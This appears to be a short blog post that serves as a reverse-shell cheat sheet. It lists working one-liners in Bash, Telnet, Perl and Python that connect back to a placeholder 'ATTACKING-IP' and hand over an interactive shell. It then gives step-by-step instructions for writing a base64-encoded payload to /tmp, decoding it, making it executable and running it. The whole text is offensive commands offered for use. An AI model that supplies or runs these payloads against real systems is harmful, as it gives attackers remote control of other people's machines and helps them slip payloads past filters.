Bash Reverse Shell
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1
Telnet Reverse Shell
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
Perl Reverse Shell
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python Reverse Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Note: In some case, we need to provide the encoded payload to the console, I recommend the solution:
1.Write file to
echo ZXhlYyAvYmluL2Jhc2ggMCYwIDI+JjA= | tee /tmp/ex.txt
2. Decode
cat /tmp/ex.txt| base64 -d | tee /tmp/ex2.txt
3. change to file sh
mv /tmp/ex2.txt /tmp/ex2.sh
4. chmod
chmod +x /tmp/ex2.sh
5. Excute
/bin/sh /tmp/ex2.sh
Nhat Truong Blog 